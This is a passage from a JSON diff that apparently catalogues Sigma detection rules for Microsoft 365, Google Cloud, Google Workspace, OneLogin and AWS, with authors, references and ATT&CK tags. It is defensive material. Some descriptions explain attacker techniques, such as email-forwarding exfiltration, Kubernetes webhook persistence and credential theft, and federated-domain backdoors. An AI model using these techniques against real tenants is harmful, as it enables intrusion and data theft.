+ ] + }, + "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", + "value": "Activity from Suspicious IP Addresses" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported suspicious email forwarding rules, for example, if a user created an inbox rule that forwards a copy of all emails to an external address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/22", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_inbox_forwarding.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", + "value": "Suspicious Inbox Forwarding" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce.\nThis is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_by_terminated_user.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "2e669ed8-742e-4fe5-b3c4-5a59b486c2ee", + "value": "Activity Performed by Terminated User" + }, + { + "description": "Alert for the addition of a new federated domain.", + "meta": { + "author": "@ionsor", + "creation_date": "2022/02/08", + "falsepositive": [ + "The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider." + ], + "filename": "microsoft365_new_federated_domain_added.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", + "https://www.sygnia.co/golden-saml-advisory", + "https://o365blog.com/post/aadbackdoor/", + "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/wp-m-unc2452-2021-000343-01.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_new_federated_domain_added.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.003" + ] + }, + "uuid": "42127bdd-9133-474f-a6f1-97b6c08a4339", + "value": "New Federated Domain Added" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user signs into your sanctioned apps from a risky IP address.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_logon_from_risky_ip_address.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_logon_from_risky_ip_address.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "c191e2fa-f9d6-4ccf-82af-4f2aba08359f", + "value": "Logon from a Risky IP Address" + }, + { + "description": "Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud.", + "meta": { + "author": "Nikita Khalimonenkov", + "creation_date": "2022/11/17", + "falsepositive": [ + "Exporting a PST can be done for legitimate purposes by legitimate sources, but due to the sensitive nature of PST content, it must be monitored." + ], + "filename": "microsoft365_pst_export_alert_using_new_compliancesearchaction.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "6897cd82-6664-11ed-9022-0242ac120002", + "value": "PST Export Alert Using New-ComplianceSearchAction" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a user has deleted a unusual a large volume of files.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_unusual_volume_of_file_deletion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_unusual_volume_of_file_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "78a34b67-3c39-4886-8fb4-61c46dc18ecd", + "value": "Microsoft 365 - Unusual Volume of File Deletion" + }, + { + "description": "Detects when a Security Compliance Center reported a user who exceeded sending limits of the service policies and because of this has been restricted from sending email.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_user_restricted_from_sending_email.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_user_restricted_from_sending_email.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1199" + ] + }, + "uuid": "ff246f56-7f24-402a-baca-b86540e3925c", + "value": "Microsoft 365 - User Restricted from Sending Email" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an app downloads multiple files from Microsoft SharePoint or Microsoft OneDrive in a manner that is unusual for the user.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_susp_oauth_app_file_download_activities.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_oauth_app_file_download_activities.yml" + ], + "tags": [ + "attack.exfiltration" + ] + }, + "uuid": "ee111937-1fe7-40f0-962a-0eb44d57d174", + "value": "Suspicious OAuth App File Download Activities" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported a risky sign-in attempt due to a login associated with an impossible travel.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2020/07/06", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_impossible_travel_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_impossible_travel_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078" + ] + }, + "uuid": "d7eab125-5f94-43df-8710-795b80fa1189", + "value": "Microsoft 365 - Impossible Travel Activity" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when a user uploads files to the cloud that might be infected with ransomware.", + "meta": { + "author": "austinsonger", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_potential_ransomware_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_potential_ransomware_activity.yml" + ], + "tags": [ + "attack.impact", + "attack.t1486" + ] + }, + "uuid": "bd132164-884a-48f1-aa2d-c6d646b04c69", + "value": "Microsoft 365 - Potential Ransomware Activity" + }, + { + "description": "Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content", + "meta": { + "author": "Sorina Ionescu", + "creation_date": "2022/02/08", + "falsepositive": [ + "PST export can be done for legitimate purposes but due to the sensitive nature of its content it must be monitored." + ], + "filename": "microsoft365_pst_export_alert.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_pst_export_alert.yml" + ], + "tags": [ + "attack.collection", + "attack.t1114" + ] + }, + "uuid": "18b88d08-d73e-4f21-bc25-4b9892a4fdd0", + "value": "PST Export Alert Using eDiscovery Alert" + }, + { + "description": "Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "microsoft365_activity_from_infrequent_country.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "m365", + "refs": [ + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_infrequent_country.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1573" + ] + }, + "uuid": "0f2468a2-5055-4212-a368-7321198ee706", + "value": "Activity from Infrequent Country" + }, + { + "description": "Identifies when a DNS Zone is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "gcp_dns_zone_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dns/docs/reference/v1/managedZones", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dns_zone_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "28268a8f-191f-4c17-85b2-f5aa4fa829c3", + "value": "Google Cloud DNS Zone Modified or Deleted" + }, + { + "description": "Identifies when the Secrets are Modified or Deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "Secrets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Secrets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_secrets_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_secrets_modified_or_deleted.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "2f0bae2d-bf20-4465-be86-1311addebaa3", + "value": "Google Cloud Kubernetes Secrets Modified or Deleted" + }, + { + "description": "Detect when a Cloud SQL DB has been modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/15", + "falsepositive": [ + "SQL Database being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SQL Database modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_sql_database_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/sql/docs/mysql/admin-api/rest/v1beta4/users/update", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_sql_database_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "f346bbd5-2c4e-4789-a221-72de7685090d", + "value": "Google Cloud SQL Database Modified or Deleted" + }, + { + "description": "Identifies when a service account is modified in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being modified may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account modified from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_modified.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_modified.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6b67c12e-5e40-47c6-b3b0-1e6b571184cc", + "value": "Google Cloud Service Account Modified" + }, + { + "description": "Detects the creation or patching of potential malicious RoleBinding. This includes RoleBindings and ClusterRoleBinding.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/09", + "falsepositive": [ + "RoleBindings and ClusterRoleBinding being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "RoleBindings and ClusterRoleBinding modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_rolebinding.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://kubernetes.io/docs/reference/access-authn-authz/rbac/", + "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control", + "https://github.com/elastic/detection-rules/pull/1267", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_rolebinding.yml" + ], + "tags": [ + "attack.credential_access" + ] + }, + "uuid": "0322d9f2-289a-47c2-b5e1-b63c90901a3e", + "value": "Google Cloud Kubernetes RoleBinding" + }, + { + "description": "Detects when storage bucket is enumerated in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Storage Buckets being enumerated may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets enumerated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_bucket_enumeration.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_enumeration.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "e2feb918-4e77-4608-9697-990a1aaf74c3", + "value": "Google Cloud Storage Buckets Enumeration" + }, + { + "description": "Identifies when a Google Cloud Kubernetes CronJob runs in Azure Cloud. Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate.\nKubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs.\nAn Adversary may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/22", + "falsepositive": [ + "Google Cloud Kubernetes CronJob/Job may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_cronjob.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/", + "https://cloud.google.com/kubernetes-engine/docs", + "https://kubernetes.io/docs/concepts/workloads/controllers/job/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.execution" + ] + }, + "uuid": "cd3a808c-c7b7-4c50-a2f3-f4cfcd436435", + "value": "Google Cloud Kubernetes CronJob" + }, + { + "description": "Identifies when a VPN Tunnel Modified or Deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/16", + "falsepositive": [ + "VPN Tunnel being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "VPN Tunnel modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_vpn_tunnel_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://any-api.com/googleapis_com/compute/docs/vpnTunnels", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_vpn_tunnel_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "99980a85-3a61-43d3-ac0f-b68d6b4797b1", + "value": "Google Cloud VPN Tunnel Modified or Deleted" + }, + { + "description": "Detects when a firewall rule is modified or deleted in Google Cloud Platform (GCP).", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Firewall rules being modified or deleted may be performed by a system administrator. Verify that the firewall configuration change was expected.", + "Exceptions can be added to this rule to filter expected behavior." + ], + "filename": "gcp_firewall_rule_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.Firewalls.html", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_firewall_rule_modified_or_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "fe513c69-734c-4d4a-8548-ac5f609be82b", + "value": "Google Cloud Firewall Modified or Deleted" + }, + { + "description": "Identifies when sensitive information is re-identified in google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "gcp_dlp_re_identifies_sensitive_information.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/dlp/docs/reference/rest/v2/projects.content/reidentify", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_dlp_re_identifies_sensitive_information.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565" + ] + }, + "uuid": "234f9f48-904b-4736-a34c-55d23919e4b7", + "value": "Google Cloud Re-identifies Sensitive Information" + }, + { + "description": "Identifies when an admission controller is executed in GCP Kubernetes.\nA Kubernetes Admission controller intercepts, and possibly modifies, requests to the Kubernetes API server.\nThe behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster.\nAn adversary can use such webhooks as the MutatingAdmissionWebhook for obtaining persistence in the cluster.\nFor example, attackers can intercept and modify the pod creation operations in the cluster and add their malicious container to every created pod. An adversary can use the webhook ValidatingAdmissionWebhook, which could be used to obtain access credentials.\nAn adversary could use the webhook to intercept the requests to the API server, record secrets, and other sensitive information.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Google Cloud Kubernetes Admission Controller may be done by a system administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_kubernetes_admission_controller.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/kubernetes-engine/docs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_admission_controller.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1078", + "attack.credential_access", + "attack.t1552", + "attack.t1552.007" + ] + }, + "uuid": "6ad91e31-53df-4826-bd27-0166171c8040", + "value": "Google Cloud Kubernetes Admission Controller" + }, + { + "description": "Identifies when a service account is disabled or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Service Account being disabled or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Service Account disabled or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_service_account_disabled_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/iam/docs/reference/rest/v1/projects.serviceAccounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_service_account_disabled_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "13f81a90-a69c-4fab-8f07-b5bb55416a9f", + "value": "Google Cloud Service Account Disabled or Deleted" + }, + { + "description": "Detects when storage bucket is modified or deleted in Google Cloud.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/14", + "falsepositive": [ + "Storage Buckets being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Storage Buckets modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_bucket_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://cloud.google.com/storage/docs/json_api/v1/buckets", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_bucket_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "4d9f2ee2-c903-48ab-b9c1-8c0f474913d0", + "value": "Google Cloud Storage Buckets Modified or Deleted" + }, + { + "description": "Identifies potential full network packet capture in gcp. This feature can potentially be abused to read sensitive data from unencrypted internal traffic.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/13", + "falsepositive": [ + "Full Network Packet Capture may be done by a system or network administrator.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "gcp_full_network_traffic_packet_capture.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "gcp", + "refs": [ + "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html", + "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074" + ] + }, + "uuid": "980a7598-1e7f-4962-9372-2d754c930d0e", + "value": "Google Full Network Traffic Packet Capture" + }, + { + "description": "Detects when an an application is removed from Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "Application being removed may be performed by a System Administrator." + ], + "filename": "gworkspace_application_removed.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "ee2803f0-71c8-4831-b48b-a1fc57601ee4", + "value": "Google Workspace Application Removed" + }, + { + "description": "Detects when an Google Workspace user is granted admin privileges.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Google Workspace admin role privileges, may be modified by system administrators." + ], + "filename": "gworkspace_user_granted_admin_privileges.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-user-settings#GRANT_ADMIN_PRIVILEGE", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_user_granted_admin_privileges.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "2d1b83e4-17c6-4896-a37b-29140b40a788", + "value": "Google Workspace User Granted Admin Privileges" + }, + { + "description": "Detects when an a role is modified or deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "6aef64e3-60c6-4782-8db3-8448759c714e", + "value": "Google Workspace Role Modified or Deleted" + }, + { + "description": "Detects when an a role privilege is deleted in Google Workspace.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/24", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_role_privilege_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-delegated-admin-settings", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_role_privilege_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "bf638ef7-4d2d-44bb-a1dc-a238252e6267", + "value": "Google Workspace Role Privilege Deleted" + }, + { + "description": "Detects when multi-factor authentication (MFA) is disabled.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/26", + "falsepositive": [ + "MFA may be disabled and performed by a system administrator." + ], + "filename": "gworkspace_mfa_disabled.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION", + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "780601d1-6376-4f2a-884e-b8d45599f78c", + "value": "Google Workspace MFA Disabled" + }, + { + "description": "Detects when an API access service account is granted domain authority.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "gworkspace_granted_domain_api_access.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "google_workspace", + "refs": [ + "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3", + "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "04e2a23a-9b29-4a5c-be3a-3542e3f982ba", + "value": "Google Workspace Granted Domain API Access" + }, + { + "description": "Detects when an user assumed another user account.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "onelogin_assumed_another_user.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_assumed_another_user.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "62fff148-278d-497e-8ecd-ad6083231a35", + "value": "OneLogin User Assumed Another User" + }, + { + "description": "Detects when an user account is locked or suspended.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/12", + "falsepositive": [ + "System may lock or suspend user accounts." + ], + "filename": "onelogin_user_account_locked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "onelogin", + "refs": [ + "https://developers.onelogin.com/api-docs/1/events/event-resource/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/onelogin/onelogin_user_account_locked.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "a717c561-d117-437e-b2d9-0118a7035d01", + "value": "OneLogin User Account Locked" + }, + { + "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_s3_data_management_tampering.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + 